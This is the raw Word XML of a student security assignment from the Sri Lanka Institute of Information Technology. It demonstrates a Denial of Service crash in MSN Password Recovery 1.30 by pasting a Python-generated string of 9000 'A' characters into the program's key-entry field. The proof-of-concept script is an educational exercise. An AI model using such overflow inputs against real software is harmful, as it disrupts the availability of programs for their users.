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3BEF9" w14:textId="0C8192B0" w:rsidR="00A44B92" w:rsidRPr="00266866" w:rsidRDefault="00096606" w:rsidP="00661388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66866">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sri Lanka Institute of Information Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACB6569" w14:textId="61E52F18" w:rsidR="003A3019" w:rsidRDefault="002668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66866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60800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16B376C5" wp14:editId="586C2F4F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1478255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3414</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2565208" cy="3212276"/>
            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="24" name="Picture 24" descr="Sri Lanka Institute of Information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ri Lanka Institute of Information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208" cy="321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63190" w14:textId="04E57E83" w:rsidR="003A3019" w:rsidRDefault="003A30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E833DA" w14:textId="255D812A" w:rsidR="003A3019" w:rsidRDefault="003A30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D3755A" w14:textId="65A7A6DA" w:rsidR="003A3019" w:rsidRDefault="003A30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11DB2C" w14:textId="3911DEE2" w:rsidR="003A3019" w:rsidRDefault="003A30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A04AE8" w14:textId="09669913" w:rsidR="003A3019" w:rsidRDefault="003A30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0B2BDE" w14:textId="079EC5CF" w:rsidR="003A3019" w:rsidRDefault="003A30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747B9" w14:textId="252786E2" w:rsidR="003A3019" w:rsidRDefault="003A30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6E5D8C" w14:textId="3D07AEB5" w:rsidR="003A3019" w:rsidRDefault="003A30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6307D" w14:textId="4ACDE2E2" w:rsidR="003A3019" w:rsidRPr="00661388" w:rsidRDefault="00533385" w:rsidP="0066138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6138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OHTS </w:t>
      </w:r>
      <w:r w:rsidR="005660D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4318F13B" w14:textId="710B7A3D" w:rsidR="00E07BA5" w:rsidRDefault="00D53BF4" w:rsidP="00D53B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43104712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Denial of Service </w:t>
      </w:r>
      <w:r w:rsidR="00533385" w:rsidRPr="006613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Exploitation of </w:t>
      </w:r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MSN Password Recovery</w:t>
      </w:r>
      <w:r w:rsidR="00E07BA5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4FE21BCC" w14:textId="44CB1DE1" w:rsidR="00661388" w:rsidRDefault="00661388" w:rsidP="006613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MS18908848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D.D.C.M. Chandrasiri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B45C8" w14:textId="4298D7B4" w:rsidR="00661388" w:rsidRDefault="00661388" w:rsidP="006613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97FBB7" w14:textId="77777777" w:rsidR="00D53BF4" w:rsidRPr="00661388" w:rsidRDefault="00D53BF4" w:rsidP="006613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481A0F" w14:textId="431C6BBE" w:rsidR="003A3019" w:rsidRDefault="003A30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34F593" w14:textId="5463C246" w:rsidR="003A3019" w:rsidRPr="00462502" w:rsidRDefault="003A301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6250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Problem Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1220E368" w14:textId="5491254C" w:rsidR="00A763E3" w:rsidRPr="0051287D" w:rsidRDefault="00D53B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MSN Password Recovery is a program that allows to recover stored local passwords in the computer relating to certain Microsoft accounts such as MSN messenger and Hotmail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB569A" w14:textId="77777777" w:rsidR="00290603" w:rsidRDefault="00290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F7281" w14:textId="6485E1A4" w:rsidR="003A3019" w:rsidRDefault="00D53B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3B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2E3235" wp14:editId="20DA4F36">
            <wp:extent cx="5731510" cy="3950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6982" w14:textId="34319318" w:rsidR="00FD57CE" w:rsidRDefault="00FD5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E4C4A6" w14:textId="5378961E" w:rsidR="00FD57CE" w:rsidRDefault="00FD57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23DBFB" w14:textId="7EBB1947" w:rsidR="00290603" w:rsidRDefault="00290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5A49D" w14:textId="3B490390" w:rsidR="00290603" w:rsidRDefault="00290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1A6DC5" w14:textId="3FF22331" w:rsidR="00290603" w:rsidRDefault="00290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3CD5C2" w14:textId="03E14DD8" w:rsidR="00290603" w:rsidRDefault="002906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AF4306" w14:textId="1A23D110" w:rsidR="00BD1001" w:rsidRPr="00462502" w:rsidRDefault="00BD100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62502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D</w:t>
      </w:r>
      <w:r w:rsidR="00FD57CE" w:rsidRPr="0046250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escription of the </w:t>
      </w:r>
      <w:r w:rsidR="006B1EFA" w:rsidRPr="00462502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1762056F" w14:textId="6C9DD42C" w:rsidR="007E66F4" w:rsidRDefault="0024104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E29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Technical Explanation of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A9428E" w:rsidRPr="007E29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particular </w:t>
      </w:r>
      <w:r w:rsidRPr="007E299A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007E66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7E299A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerability to be exploited is </w:t>
      </w:r>
      <w:r w:rsidR="00D53BF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a Denial of Service by exploiting a bug in the application registration. D</w:t>
      </w:r>
      <w:r w:rsidR="00322FE1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>emonstration video will explain the mechanism of action behind the exploitation.</w:t>
      </w:r>
      <w:r w:rsidR="0012194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55A1ED00" w14:textId="401E4BC3" w:rsidR="00BA7BA3" w:rsidRDefault="00A9428E" w:rsidP="00D53B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29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Risk / Impact for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E299A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>particular Domain</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007E66F4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D53BF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The application will crash following the exploitation.</w:t>
      </w:r>
      <w:r w:rsidR="00121942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39C15CF" w14:textId="15830977" w:rsidR="00FD57CE" w:rsidRPr="00F26EB4" w:rsidRDefault="00E15A0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26EB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Demonstration of the Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A70626E" w14:textId="1D1257A8" w:rsidR="00FD57CE" w:rsidRDefault="00AE64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First, we </w:t>
      </w:r>
      <w:r w:rsidR="0082378E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>install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43EE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vulnerable product in Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F1EBA" w14:textId="1FF360A1" w:rsidR="00AF3502" w:rsidRDefault="00AF35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15E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53BF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MSN Password Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA89A63" w14:textId="7ADE573C" w:rsidR="00AF3502" w:rsidRDefault="00AF35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015EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version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53BF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52459B71" w14:textId="71944B63" w:rsidR="00043EE7" w:rsidRDefault="00D53B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3B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1D0129" wp14:editId="30C266D3">
            <wp:extent cx="2791215" cy="64779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8A0C" w14:textId="4B740199" w:rsidR="00A93367" w:rsidRDefault="00A93367" w:rsidP="00B94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6E1FC7" w14:textId="67C5DCEC" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94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B93C73" w14:textId="5950E523" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94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7355FF" w14:textId="56B6C8CA" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94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41CD37" w14:textId="206A9D09" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94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36D92A" w14:textId="38C1DFE8" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94F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select “Enter Key” in the application and the following window will pop up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7AB8A" w14:textId="77777777" w:rsidR="0024718F" w:rsidRDefault="0024718F" w:rsidP="00B94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80D8A2" w14:textId="5785DF6D" w:rsidR="00794063" w:rsidRDefault="0024718F" w:rsidP="00B94F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18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D3A08FC" wp14:editId="0677635F">
            <wp:extent cx="3991532" cy="2924583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7A40" w14:textId="2AA69A7B" w:rsidR="00794063" w:rsidRDefault="00794063" w:rsidP="00B94F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67E6F" w14:textId="5EF60F79" w:rsidR="0063652D" w:rsidRDefault="0024718F" w:rsidP="00B94FF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run the following python script to generate</w:t>
      </w:r>
      <w:r w:rsidR="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sequence of characters that can be pasted into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0063652D"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 w:rsidR="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to trigger Denial of Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56561FF8" w14:textId="77777777" w:rsidR="0063652D" w:rsidRPr="0063652D" w:rsidRDefault="0063652D" w:rsidP="00636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652D"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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063652D"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 w:rsidRPr="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115565E" w14:textId="77777777" w:rsidR="0063652D" w:rsidRPr="0063652D" w:rsidRDefault="0063652D" w:rsidP="0063652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3652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dos= "\x41" * 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F35DA" w14:textId="77777777" w:rsidR="0063652D" w:rsidRPr="0063652D" w:rsidRDefault="0063652D" w:rsidP="00636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3652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=open('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CRASH.txt','w</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0063652D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78E1E700" w14:textId="77777777" w:rsidR="0063652D" w:rsidRPr="0063652D" w:rsidRDefault="0063652D" w:rsidP="00636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652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myfile.writelines</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(Dos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67E00B" w14:textId="77777777" w:rsidR="0063652D" w:rsidRPr="0063652D" w:rsidRDefault="0063652D" w:rsidP="00636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3652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myfile.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0063652D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AB6BA9F" w14:textId="20BC76AA" w:rsidR="0063652D" w:rsidRDefault="0063652D" w:rsidP="0063652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3652D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63652D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"File created")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36529CF9" w14:textId="1A5CCA89" w:rsidR="0063652D" w:rsidRDefault="0063652D" w:rsidP="00636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6AC1DE" w14:textId="34B3CF8D" w:rsidR="005C2DA5" w:rsidRDefault="005C2DA5" w:rsidP="0063652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r w:rsidRPr="005C2DA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12E351A" wp14:editId="382CBAA3">
            <wp:extent cx="4848225" cy="3643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2734" cy="364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D44CE63" w14:textId="77777777" w:rsidR="005C2DA5" w:rsidRDefault="005C2DA5" w:rsidP="0063652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914274" w14:textId="2700BEC2" w:rsidR="005C2DA5" w:rsidRDefault="0063652D" w:rsidP="0063652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 then copy the</w:t>
      </w:r>
      <w:r w:rsidR="005C2DA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> above content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CRASH.txt </w:t>
      </w:r>
      <w:r w:rsidR="005C2DA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into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field in the application and press OK. The application will Crash.</w:t>
      </w:r>
      <w:r w:rsidR="005C2DA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The video will demonstrate the crash.</w:t>
      </w:r>
      <w:r w:rsidR="005C2DA5" w:rsidRPr="005C2D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2DA5" w:rsidRPr="005C2DA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5BB8595" wp14:editId="560065A4">
            <wp:extent cx="5000925" cy="3448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100" cy="34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DA5" w:rsidSect="00E56C45">
      <w:foot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502AA" w14:textId="77777777" w:rsidR="00201B44" w:rsidRDefault="00201B44" w:rsidP="002E775E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5A141CED" w14:textId="77777777" w:rsidR="00201B44" w:rsidRDefault="00201B44" w:rsidP="002E7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800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BA2B5" w14:textId="413A93C0" w:rsidR="002E775E" w:rsidRDefault="002E77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0460BC" w14:textId="77777777" w:rsidR="002E775E" w:rsidRDefault="002E7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95B69" w14:textId="77777777" w:rsidR="00201B44" w:rsidRDefault="00201B44" w:rsidP="002E775E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="270A1ED1" w14:textId="77777777" w:rsidR="00201B44" w:rsidRDefault="00201B44" w:rsidP="002E77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E7"/>
    <w:rsid w:val="00000DC2"/>
    <w:rsid w:val="000015EF"/>
    <w:rsid w:val="00030C25"/>
    <w:rsid w:val="00043EE7"/>
    <w:rsid w:val="0004460B"/>
    <w:rsid w:val="00085E63"/>
    <w:rsid w:val="00095081"/>
    <w:rsid w:val="00096606"/>
    <w:rsid w:val="000A0DB0"/>
    <w:rsid w:val="000B0C0C"/>
    <w:rsid w:val="000C170C"/>
    <w:rsid w:val="000F027F"/>
    <w:rsid w:val="000F7EC3"/>
    <w:rsid w:val="001213BF"/>
    <w:rsid w:val="00121942"/>
    <w:rsid w:val="001350E9"/>
    <w:rsid w:val="00156500"/>
    <w:rsid w:val="00156B9A"/>
    <w:rsid w:val="00157DF3"/>
    <w:rsid w:val="00164B95"/>
    <w:rsid w:val="0019246C"/>
    <w:rsid w:val="001975A0"/>
    <w:rsid w:val="001A0BBF"/>
    <w:rsid w:val="001A25DC"/>
    <w:rsid w:val="001C6CDE"/>
    <w:rsid w:val="001E01A7"/>
    <w:rsid w:val="001E2F9A"/>
    <w:rsid w:val="00201B44"/>
    <w:rsid w:val="002241C1"/>
    <w:rsid w:val="00230333"/>
    <w:rsid w:val="00241040"/>
    <w:rsid w:val="0024718F"/>
    <w:rsid w:val="00266866"/>
    <w:rsid w:val="00290603"/>
    <w:rsid w:val="002A0D90"/>
    <w:rsid w:val="002E08EC"/>
    <w:rsid w:val="002E775E"/>
    <w:rsid w:val="00307BCB"/>
    <w:rsid w:val="003204A3"/>
    <w:rsid w:val="00322FE1"/>
    <w:rsid w:val="003421C1"/>
    <w:rsid w:val="0036754D"/>
    <w:rsid w:val="00393BE7"/>
    <w:rsid w:val="003A3019"/>
    <w:rsid w:val="003D38B4"/>
    <w:rsid w:val="003D43FD"/>
    <w:rsid w:val="003D7F41"/>
    <w:rsid w:val="00412F72"/>
    <w:rsid w:val="004153B8"/>
    <w:rsid w:val="00462120"/>
    <w:rsid w:val="00462502"/>
    <w:rsid w:val="004C4450"/>
    <w:rsid w:val="004F77CD"/>
    <w:rsid w:val="00507CC1"/>
    <w:rsid w:val="0051287D"/>
    <w:rsid w:val="0051465E"/>
    <w:rsid w:val="00515623"/>
    <w:rsid w:val="00533385"/>
    <w:rsid w:val="005660D7"/>
    <w:rsid w:val="005B5609"/>
    <w:rsid w:val="005B77DB"/>
    <w:rsid w:val="005C2DA5"/>
    <w:rsid w:val="005D32A1"/>
    <w:rsid w:val="005E04FF"/>
    <w:rsid w:val="005E2CC4"/>
    <w:rsid w:val="005E2E68"/>
    <w:rsid w:val="00633BF1"/>
    <w:rsid w:val="0063652D"/>
    <w:rsid w:val="00644E17"/>
    <w:rsid w:val="00661388"/>
    <w:rsid w:val="00671DC3"/>
    <w:rsid w:val="006B1EFA"/>
    <w:rsid w:val="006B5070"/>
    <w:rsid w:val="006C55BD"/>
    <w:rsid w:val="006D31D9"/>
    <w:rsid w:val="0074049E"/>
    <w:rsid w:val="00750222"/>
    <w:rsid w:val="00751200"/>
    <w:rsid w:val="00751874"/>
    <w:rsid w:val="007735B8"/>
    <w:rsid w:val="00794063"/>
    <w:rsid w:val="007E299A"/>
    <w:rsid w:val="007E57D8"/>
    <w:rsid w:val="007E66F4"/>
    <w:rsid w:val="007F3F1B"/>
    <w:rsid w:val="00804382"/>
    <w:rsid w:val="00813E6B"/>
    <w:rsid w:val="0082378E"/>
    <w:rsid w:val="00825D89"/>
    <w:rsid w:val="00844B10"/>
    <w:rsid w:val="00853921"/>
    <w:rsid w:val="00886EF8"/>
    <w:rsid w:val="008A2383"/>
    <w:rsid w:val="008B2F56"/>
    <w:rsid w:val="008B5A25"/>
    <w:rsid w:val="008C27B1"/>
    <w:rsid w:val="0091027F"/>
    <w:rsid w:val="00911DB0"/>
    <w:rsid w:val="009436BD"/>
    <w:rsid w:val="009506A8"/>
    <w:rsid w:val="00983A8B"/>
    <w:rsid w:val="009E4F84"/>
    <w:rsid w:val="00A03DDB"/>
    <w:rsid w:val="00A2384F"/>
    <w:rsid w:val="00A44B92"/>
    <w:rsid w:val="00A70C32"/>
    <w:rsid w:val="00A763E3"/>
    <w:rsid w:val="00A81205"/>
    <w:rsid w:val="00A92716"/>
    <w:rsid w:val="00A93367"/>
    <w:rsid w:val="00A9428E"/>
    <w:rsid w:val="00AA11FA"/>
    <w:rsid w:val="00AA1FBE"/>
    <w:rsid w:val="00AB392B"/>
    <w:rsid w:val="00AE648A"/>
    <w:rsid w:val="00AF3502"/>
    <w:rsid w:val="00B14659"/>
    <w:rsid w:val="00B73EE1"/>
    <w:rsid w:val="00B746E6"/>
    <w:rsid w:val="00B94FF1"/>
    <w:rsid w:val="00BA7BA3"/>
    <w:rsid w:val="00BD1001"/>
    <w:rsid w:val="00C2116B"/>
    <w:rsid w:val="00C23A77"/>
    <w:rsid w:val="00C344FD"/>
    <w:rsid w:val="00C4729B"/>
    <w:rsid w:val="00C53603"/>
    <w:rsid w:val="00C70620"/>
    <w:rsid w:val="00C820C3"/>
    <w:rsid w:val="00C91DC2"/>
    <w:rsid w:val="00C95192"/>
    <w:rsid w:val="00CB0998"/>
    <w:rsid w:val="00CB2834"/>
    <w:rsid w:val="00D15CA6"/>
    <w:rsid w:val="00D32428"/>
    <w:rsid w:val="00D533A3"/>
    <w:rsid w:val="00D53BF4"/>
    <w:rsid w:val="00D758BE"/>
    <w:rsid w:val="00D87923"/>
    <w:rsid w:val="00DA362D"/>
    <w:rsid w:val="00DA4BA6"/>
    <w:rsid w:val="00DB46F1"/>
    <w:rsid w:val="00DC575B"/>
    <w:rsid w:val="00DF5888"/>
    <w:rsid w:val="00E06AB5"/>
    <w:rsid w:val="00E0793A"/>
    <w:rsid w:val="00E07BA5"/>
    <w:rsid w:val="00E15A06"/>
    <w:rsid w:val="00E31E62"/>
    <w:rsid w:val="00E374A6"/>
    <w:rsid w:val="00E56C45"/>
    <w:rsid w:val="00E72337"/>
    <w:rsid w:val="00E84945"/>
    <w:rsid w:val="00EA721F"/>
    <w:rsid w:val="00EB4770"/>
    <w:rsid w:val="00EF17D6"/>
    <w:rsid w:val="00F26EB4"/>
    <w:rsid w:val="00F77CCB"/>
    <w:rsid w:val="00F80721"/>
    <w:rsid w:val="00FC1272"/>
    <w:rsid w:val="00FD2A6E"/>
    <w:rsid w:val="00FD57CE"/>
    <w:rsid w:val="00FE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23465"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E073937E-170F-4EC2-B544-642230F5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62D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0075022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02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222"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-v">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00E06AB5"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E66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75E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E77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3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17717F731C9843AE5274993A65D8D0" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8df7ce6d552516cce47817e84dbfc4d0">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="959c17de-3616-459e-9f81-95ee1c96b096" xmlns:ns4="69df0899-9466-46d9-b4d2-6af5b183a6ad" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2f2fee8c48debf79e5d6ae6742a051c7" ns3:_="" ns4:_="">
    <xsd:import namespace="959c17de-3616-459e-9f81-95ee1c96b096"/>
